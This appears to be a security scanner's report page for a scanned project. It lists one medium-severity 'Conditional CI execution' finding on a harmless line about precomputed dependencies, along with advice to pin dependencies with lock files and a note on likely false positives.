A
92/100 First Seen
Feb 18, 2026
Last Scanned
Feb 20, 2026
Findings
1
Score
92/100
MEDIUM 1
Findings (1)
MEDIUM
Conditional CI execution
L32 Detects conditional execution based on CI environment variables combined with dangerous commands
if deps precomputed in CI
+ SUBPROCESS FIX
Pin all dependencies to exact versions with integrity hashes. Use lock files (package-lock.json, poetry.lock) and enable checksum verification in your package manager.
FP?
Likely FP if the match is documentation about dependency management best practices rather than actual unpinned dependency declarations.